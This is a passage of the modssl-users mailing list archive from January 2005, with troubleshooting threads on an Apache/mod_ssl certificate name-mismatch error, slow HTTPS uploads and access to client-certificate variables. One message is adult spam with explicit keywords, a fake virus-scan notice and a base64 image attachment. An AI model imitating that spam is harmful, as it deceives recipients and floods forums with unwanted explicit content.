Message-ID: <40F9DB7EECEB4240B6FC40E23CD26CA503FD76F6@mlnyb704mb.amrs.win.ml.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Domain Name Mismatch
thread-index: AcT6VJ1cVk0qwKp0SRy4FLPUJY4GJQ==
From: "Haskell, Scott (MLPRO SF)" 
To: 
X-OriginalArrivalTime: 14 Jan 2005 16:18:50.0071 (UTC) FILETIME=[BB5AE670:01C4FA54]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Haskell, Scott (MLPRO SF)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C4FA54.9D5F4000
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Greetings All,

After much scouring of the web (modssl mailing list archives,
newsgroups, websites) I can't seem to find a resolution to my problem.
I've built apache_1.3.33, mod_ssl-2.8.22-1.3.33 and mm-1.3.1 as per the
modssl INSTALL doc, section b (the flexible APACI-only way). Modssl is
built and loaded as a DSO. I have a Verisign global certificate that
I've installed, along with the appropriate intermediate certificate
(SSLCertificateChainFile). I have also installed the root CA certs as
well (SSLCACertificateFile).

Here is my problem. When I navigate to the site (FQDN, not IP), via a
browser (IE, Firefox, Mozilla...), I get a Domain Name Mismatch error
reported by the browser. When I view the certificate, it shows that the
CN matches the FQDN of the website, exactly. The website is
www.myhost.domain.com and the CN that I used to create the cert is also
www.myhost.domain.com. There is no mismatch between the FQDN of the site
and the CN in the cert, yet the browser thinks there is. I can do a
forward and reverse lookup on the FQDN and it's corresponding IP and
both are correct, so this leads me to believe it's not a DNS issue. I
viewed the cert in IE and checked the certificate path (3rd tab). The
certificate status of all three certs (root, intermediate and my cert)
is reported as 'OK'. The intermediate and root CA's also load with no
errors (verified in the ssl_engine_log). This leads me to believe it's
not a chaining problem. I've also tried creating and signing my own cert
for testing purposes and I have the same issue, so that leads me to
believe it's not a cert issue. I've also verified the csr, cert and key
and they all match up.=20

I'm at a loss here, so any help would be greatly appreciated. From all
my research and what I've read, my error should really only stem from
not using the FQDN of the site when creating the csr, but this is not
the case. I quadruple checked it and I've created test certs as well,
with the same results. Has anyone had a similar problem? Any suggestions
on apache server config? I've even tried it with the most basic SSL
options enabled in my httpd.conf file that would allow the hosting of an
SSL enabled site. Thanks for your time and suggestions!

Regards,
Scott Haskell
Solaris SA, Merrill Lynch Pro, San Francisco
--------------------------------------------------------

If you are not an intended recipient of this e-mail, please notify the =
sender, delete it and do not read, act upon, print, disclose, copy, =
retain or redistribute it. Click here for important additional terms =
relating to this e-mail.     http://www.ml.com/email_terms/
--------------------------------------------------------

------_=_NextPart_001_01C4FA54.9D5F4000
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable





						


Domain Name Mismatch

					
						




Greetings All,




After much scouring of the web (modssl =
mailing list archives, newsgroups, websites) I can't seem to find a =
resolution to my problem. I've built apache_1.3.33, =
mod_ssl-2.8.22-1.3.33 and mm-1.3.1 as per the modssl INSTALL doc, =
section b (the flexible APACI-only way). Modssl is built and loaded as a =
DSO. I have a Verisign global certificate that I've installed, along =
with the appropriate intermediate certificate (SSLCertificateChainFile). =
I have also installed the root CA certs as well =
(SSLCACertificateFile).



Here is my problem. When I navigate to =
the site (FQDN, not IP), via a browser (IE, Firefox, Mozilla…), I =
get a Domain Name Mismatch error reported by the browser. When I view =
the certificate, it shows that the CN matches the FQDN of the website, =
exactly. The website is www.myhost.domain.com and the CN that I used to create the cert is =
also www.myhost.domain.com. There is no mismatch between the FQDN of the site and =
the CN in the cert, yet the browser thinks there is. I can do a forward =
and reverse lookup on the FQDN and it's corresponding IP and both are =
correct, so this leads me to believe it's not a DNS issue. I viewed the =
cert in IE and checked the certificate path (3rd tab). The certificate =
status of all three certs (root, intermediate and my cert) is reported =
as 'OK'. The intermediate and root CA's also load with no errors =
(verified in the ssl_engine_log). This leads me to believe it's not a =
chaining problem. I've also tried creating and signing my own cert for =
testing purposes and I have the same issue, so that leads me to believe =
it's not a cert issue. I've also verified the csr, cert and key and they =
all match up. 



I'm at a loss here, so any help would =
be greatly appreciated. From all my research and what I've read, my =
error should really only stem from not using the FQDN of the site when =
creating the csr, but this is not the case. I quadruple checked it and =
I've created test certs as well, with the same results. Has anyone had a =
similar problem? Any suggestions on apache server config? I've even =
tried it with the most basic SSL options enabled in my httpd.conf file =
that would allow the hosting of an SSL enabled site. Thanks for your =
time and suggestions!



Regards,


Scott Haskell


Solaris SA, Merrill Lynch Pro, San =
Francisco





						

							

						

						
If you are not an intended recipient of this e-mail, please =
notify the sender, delete it and do not read, act upon, print, disclose, =
copy, retain or redistribute it. Click here for important =
additional terms relating to this e-mail.     http://www.ml.com/email_terms/

						

							

						


------_=_NextPart_001_01C4FA54.9D5F4000--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 14 18:14:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 46A27A8948; Fri, 14 Jan 2005 18:14:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta9.adelphia.net (mta9.adelphia.net [68.168.78.199])
	by master.modssl.org (Postfix) with ESMTP id 3C98AA8941
	for ; Fri, 14 Jan 2005 18:14:46 +0100 (CET)
Received: from [10.0.0.102] (really [69.164.247.10]) by mta9.adelphia.net
          (InterMail vM.6.01.03.02 201-2131-111-104-20040324) with ESMTP
          id <20050114171427.EKHC14945.mta9.adelphia.net@[10.0.0.102]>
          for ; Fri, 14 Jan 2005 12:14:27 -0500
Received: from 127.0.0.1 (AVG SMTP 7.0.300 [265.6.11]); Fri, 14 Jan 2005 12:14:33 -0500
Message-ID: <000801c4fa5c$841747f0$6600000a@ibhome>
From: "Ihor Bilyy" 
To: 
References: <40F9DB7EECEB4240B6FC40E23CD26CA503FD76F6@mlnyb704mb.amrs.win.ml.com>
Subject: Re: Domain Name Mismatch
Date: Fri, 14 Jan 2005 12:14:33 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C4FA32.9B3A1400"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ihor Bilyy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C4FA32.9B3A1400
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Domain Name Mismatchwhat is your ServerName in apache/ssl .conf file ?

-i-
  ----- Original Message -----=20
  From: Haskell, Scott (MLPRO SF)=20
  To: modssl-users@modssl.org=20
  Sent: Friday, January 14, 2005 11:17 AM
  Subject: Domain Name Mismatch


  Greetings All,=20

  After much scouring of the web (modssl mailing list archives, =
newsgroups, websites) I can't seem to find a resolution to my problem. =
I've built apache_1.3.33, mod_ssl-2.8.22-1.3.33 and mm-1.3.1 as per the =
modssl INSTALL doc, section b (the flexible APACI-only way). Modssl is =
built and loaded as a DSO. I have a Verisign global certificate that =
I've installed, along with the appropriate intermediate certificate =
(SSLCertificateChainFile). I have also installed the root CA certs as =
well (SSLCACertificateFile).

  Here is my problem. When I navigate to the site (FQDN, not IP), via a =
browser (IE, Firefox, Mozilla.), I get a Domain Name Mismatch error =
reported by the browser. When I view the certificate, it shows that the =
CN matches the FQDN of the website, exactly. The website is =
www.myhost.domain.com and the CN that I used to create the cert is also =
www.myhost.domain.com. There is no mismatch between the FQDN of the site =
and the CN in the cert, yet the browser thinks there is. I can do a =
forward and reverse lookup on the FQDN and it's corresponding IP and =
both are correct, so this leads me to believe it's not a DNS issue. I =
viewed the cert in IE and checked the certificate path (3rd tab). The =
certificate status of all three certs (root, intermediate and my cert) =
is reported as 'OK'. The intermediate and root CA's also load with no =
errors (verified in the ssl_engine_log). This leads me to believe it's =
not a chaining problem. I've also tried creating and signing my own cert =
for testing purposes and I have the same issue, so that leads me to =
believe it's not a cert issue. I've also verified the csr, cert and key =
and they all match up.=20

  I'm at a loss here, so any help would be greatly appreciated. From all =
my research and what I've read, my error should really only stem from =
not using the FQDN of the site when creating the csr, but this is not =
the case. I quadruple checked it and I've created test certs as well, =
with the same results. Has anyone had a similar problem? Any suggestions =
on apache server config? I've even tried it with the most basic SSL =
options enabled in my httpd.conf file that would allow the hosting of an =
SSL enabled site. Thanks for your time and suggestions!

  Regards,=20
  Scott Haskell=20
  Solaris SA, Merrill Lynch Pro, San Francisco=20


-------------------------------------------------------------------------=
-----

  If you are not an intended recipient of this e-mail, please notify the =
sender, delete it and do not read, act upon, print, disclose, copy, =
retain or redistribute it. Click here for important additional terms =
relating to this e-mail.     http://www.ml.com/email_terms/

-------------------------------------------------------------------------=
-----

------=_NextPart_000_0005_01C4FA32.9B3A1400
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


Domain Name Mismatch






what is your ServerName in apache/ssl =
.conf file=20
?


 


-i-



  
----- Original Message ----- 

  From:=20
  Haskell,=20
  Scott (MLPRO SF) 
  
  
Sent: Friday, January 14, 2005 =
11:17=20
  AM

  
Subject: Domain Name =
Mismatch

  


  

  
Greetings All, 

  
After much scouring of the web (modssl =
mailing list=20
  archives, newsgroups, websites) I can't seem to find a resolution to =
my=20
  problem. I've built apache_1.3.33, mod_ssl-2.8.22-1.3.33 and mm-1.3.1 =
as per=20
  the modssl INSTALL doc, section b (the flexible APACI-only way). =
Modssl is=20
  built and loaded as a DSO. I have a Verisign global certificate that =
I've=20
  installed, along with the appropriate intermediate certificate=20
  (SSLCertificateChainFile). I have also installed the root CA certs as =
well=20
  (SSLCACertificateFile).

  
Here is my problem. When I navigate to =
the site=20
  (FQDN, not IP), via a browser (IE, Firefox, Mozilla=85), I get a =
Domain Name=20
  Mismatch error reported by the browser. When I view the certificate, =
it shows=20
  that the CN matches the FQDN of the website, exactly. The website is =
www.myhost.domain.com and the CN=20
  that I used to create the cert is also www.myhost.domain.com. There is=20
  no mismatch between the FQDN of the site and the CN in the cert, yet =
the=20
  browser thinks there is. I can do a forward and reverse lookup on the =
FQDN and=20
  it's corresponding IP and both are correct, so this leads me to =
believe it's=20
  not a DNS issue. I viewed the cert in IE and checked the certificate =
path (3rd=20
  tab). The certificate status of all three certs (root, intermediate =
and my=20
  cert) is reported as 'OK'. The intermediate and root CA's also load =
with no=20
  errors (verified in the ssl_engine_log). This leads me to believe it's =
not a=20
  chaining problem. I've also tried creating and signing my own cert for =
testing=20
  purposes and I have the same issue, so that leads me to believe it's =
not a=20
  cert issue. I've also verified the csr, cert and key and they all =
match up.=20
  

  
I'm at a loss here, so any help would =
be greatly=20
  appreciated. From all my research and what I've read, my error should =
really=20
  only stem from not using the FQDN of the site when creating the csr, =
but this=20
  is not the case. I quadruple checked it and I've created test certs as =
well,=20
  with the same results. Has anyone had a similar problem? Any =
suggestions on=20
  apache server config? I've even tried it with the most basic SSL =
options=20
  enabled in my httpd.conf file that would allow the hosting of an SSL =
enabled=20
  site. Thanks for your time and suggestions!

  
Regards, 
Scott=20
  Haskell 
Solaris SA, Merrill =
Lynch Pro, San=20
  Francisco 

  

  

  

  
If you are not an intended recipient of this e-mail, please =
notify the=20
  sender, delete it and do not read, act upon, print, disclose, copy, =
retain or=20
  redistribute it. Click here =
for=20
  important additional terms relating to this =
e-mail.     http://www.ml.com/email_terms/

  

  

  


------=_NextPart_000_0005_01C4FA32.9B3A1400--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 14 19:26:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BDC27A8A85; Fri, 14 Jan 2005 19:26:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from int1.nea-fast.com (mail.nea-fast.com [66.35.146.201])
	by master.modssl.org (Postfix) with ESMTP id F10C3A8933
	for ; Fri, 14 Jan 2005 19:26:38 +0100 (CET)
Received: from nea-fast.com (unknown [192.168.1.101])
	by int1.nea-fast.com (Postfix) with ESMTP id E0E0828058BB
	for ; Fri, 14 Jan 2005 13:26:22 -0500 (EST)
Message-ID: <41E80ECF.4050805@nea-fast.com>
Date: Fri, 14 Jan 2005 13:26:23 -0500
From: kernel 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4.3) Gecko/20041010
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: windows clients slow transfering files to apache/linux server
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kernel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've run into a problem when using windows clients to transfer files to 
an apache/linux server. We use an in-house windows app which calls a cgi 
located on the server and transfers a file to it. The problem we're 
having is the transfer speed is almost a 3rd of what it should be (1mb 
file = 16 sec). We put up a simple cgi which allows the client to choose 
a file and upload it to the server to determine if it was our 
application or something with apache/windows . We're getting the same 
slow upload results. We've run this test from multiple locations each 
with a dedicated T-1 with no other traffic and the results are 
consitant. If we use a Linux box, we get the full T-1 speed (1mb file = 
6sec). If we don't use https, we get 6 second times with Win98 but 16 
second times with Win 2000pro. We are able to download files from this 
server with no problem. When testing from home, I'm able to get the full 
2meg download speed.

Apache 1.3.33
Kernel 2.4.21-4.EL

We've tried both perl and c++ CGIs.

Any ideas ??
Thanks walt !

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 14 19:52:48 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 91ADEA8A85; Fri, 14 Jan 2005 19:52:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tb-solutions.com (129.Red-81-47-236.pooles.rima-tde.net [81.47.236.129])
	by master.modssl.org (Postfix) with ESMTP id AF525A8933
	for ; Fri, 14 Jan 2005 19:52:37 +0100 (CET)
Received: from zazroyop [10.50.2.23] by tb-solutions.com
  (SMTPD32-8.05) id A4B54CC0112; Fri, 14 Jan 2005 19:51:33 +0100
Message-ID: <000f01c4fa6a$52ac7dd0$1702320a@tbsolutions.com>
From: "Pablo J Royo" 
To: 
References: <41E80ECF.4050805@nea-fast.com>
Subject: Re: windows clients slow transfering files to apache/linux server
Date: Fri, 14 Jan 2005 19:53:23 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2741.2600
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2742.200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pablo J Royo" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I think this could have to do with the size your socket send buffer is.
This buffer is the number of bytes the network can support without beeing
acknoledged from remote side. If your buffer is small, your software will
have to wait more times untill all that (few) bytes are acknoledged from
remote side. The ideal situation is to have as much bytes "flying" on the
network as it can support so you must increase that buffer size.
On Linux it may be larger than on Windows, so transfer will be faster.

You can adjust that size in your app with the setsockopt( ) function after
the socket( ) call.

Hope this helps

Pablo J.Royo
http://spipe.sourceforge.net

----- Original Message -----
From: "kernel" 
To: 
Sent: Friday, January 14, 2005 7:26 PM
Subject: windows clients slow transfering files to apache/linux server


> I've run into a problem when using windows clients to transfer files to
> an apache/linux server. We use an in-house windows app which calls a cgi
> located on the server and transfers a file to it. The problem we're
> having is the transfer speed is almost a 3rd of what it should be (1mb
> file = 16 sec). We put up a simple cgi which allows the client to choose
> a file and upload it to the server to determine if it was our
> application or something with apache/windows . We're getting the same
> slow upload results. We've run this test from multiple locations each
> with a dedicated T-1 with no other traffic and the results are
> consitant. If we use a Linux box, we get the full T-1 speed (1mb file =
> 6sec). If we don't use https, we get 6 second times with Win98 but 16
> second times with Win 2000pro. We are able to download files from this
> server with no problem. When testing from home, I'm able to get the full
> 2meg download speed.
>
> Apache 1.3.33
> Kernel 2.4.21-4.EL
>
> We've tried both perl and c++ CGIs.
>
> Any ideas ??
> Thanks walt !
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 14 22:48:33 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EA928A8948; Fri, 14 Jan 2005 22:48:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail1.nrl.navy.mil (smail1.nrl.navy.mil [132.250.1.115])
	by master.modssl.org (Postfix) with ESMTP id 34CCBA8941
	for ; Fri, 14 Jan 2005 22:48:27 +0100 (CET)
Received: from mail1.nrl.navy.mil (localhost [127.0.0.1])
	by mail1.nrl.navy.mil (8.12.11/8.12.11) with SMTP id j0ELm2pn005002
	for ; Fri, 14 Jan 2005 16:48:12 -0500 (EST)
Received: from 0.0.0.0 ([127.0.0.1])
 by mail1.nrl.navy.mil (SAVSMTP 3.1.7.47) with SMTP id M2005011416481214055
 for ; Fri, 14 Jan 2005 16:48:12 -0500
Received: from [132.250.113.161] (jbook.nrl.navy.mil [132.250.113.161]) by mail1.nrl.navy.mil with SMTP (MailShield v2.04 - SOLARIS/SPARC Jul 18 2001 17:16:48); Fri, 14 Jan 2005 16:48:11 -0500
Mime-Version: 1.0 (Apple Message framework v619)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; format=flowed
To: modssl-users@modssl.org
From: Jason Kaskel 
Subject: mod_ssl environment variables
Date: Fri, 14 Jan 2005 16:48:09 -0500
X-Mailer: Apple Mail (2.619)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Kaskel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is technically both a mod_perl and mod_ssl question. Maybe I 
should harass their mailing list too.

I have a PerlAccessHandler that needs to access certificate 
information.  According to what I've read the environment isn't loaded 
with this information until the fixup phase which occurs right before 
the response phase (and well after the access phase).  Is there any 
other way for me to access certificate information this early in the 
Apache process (specifically the data that gets loaded into 
SSL_CLIENT_S_DN_CN)?  Failing that is there a way for me to force the 
fixup phase to occur before the access phase?

Thanks for any help!

-Jason
kaskel@ccs.nrl.navy.mil

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 15 07:43:25 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80C09A8A79; Sat, 15 Jan 2005 07:43:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (CPE0004764da6d1-CM014340029021.cpe.net.cable.rogers.com [24.103.74.128])
	by master.modssl.org (Postfix) with SMTP id 40AC9A8A4F
	for ; Sat, 15 Jan 2005 07:43:23 +0100 (CET)
From: "rse" 
To: modssl-users@modssl.org
Subject: very hot XXX
Date: 15 Jan 2005 02:43:08 -0400
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050115064323.40AC9A8A4F@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Video's Girls Erotic WebCam's Tits Mpeg's Girls Ass SEX Pussy Video Clips
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 16 14:34:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A65F8A8A59; Sun, 16 Jan 2005 14:34:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp3.hushmail.com (smtp3.hushmail.com [65.39.178.135])
	by master.modssl.org (Postfix) with ESMTP id 159A8A8948
	for ; Sun, 16 Jan 2005 14:34:30 +0100 (CET)
Received: from smtp3.hushmail.com (localhost.hushmail.com [127.0.0.1])
	by smtp3.hushmail.com (Postfix) with SMTP id 67DFEA34B6
	for ; Sun, 16 Jan 2005 05:34:14 -0800 (PST)
Received: from mailserver2.hushmail.com (mailserver2.hushmail.com [65.39.178.21])
	by smtp3.hushmail.com (Postfix) with ESMTP
	for ; Sun, 16 Jan 2005 05:34:12 -0800 (PST)
Received: from mailserver2.hushmail.com (localhost.hushmail.com [127.0.0.1])
	by mailserver2.hushmail.com (8.12.6/8.12.3) with ESMTP id j0GDYBpT025363
	for ; Sun, 16 Jan 2005 05:34:12 -0800 (PST)
	(envelope-from auto27923@hushmail.com)
Received: (from nobody@localhost)
	by mailserver2.hushmail.com (8.12.6/8.12.3/Submit) id j0GDYBR3025361
	for modssl-users@modssl.org; Sun, 16 Jan 2005 05:34:11 -0800 (PST)
Message-Id: <200501161334.j0GDYBR3025361@mailserver2.hushmail.com>
Date: Sun, 16 Jan 2005 05:34:08 -0800
To: modssl-users@modssl.org
Cc: 
Subject: ssl proxy doco for nids/nips (quick howto) 
From: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hey there,

thought people might like to note this quick doco on setting up a 
ssl proxy / ssl accelerator to protect web servers, also allowing 
nips/nids to sniff http streams to 'https' servers, among many 
other benefits

there wasn't much doco online so i thought i'd write something 
quick up

http://miscname.com/public/ssl-proxy/



cheerz

PHee




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 17 12:01:10 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5D9DBA8A4D; Mon, 17 Jan 2005 12:01:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60704.mail.yahoo.com (web60704.mail.yahoo.com [216.109.117.227])
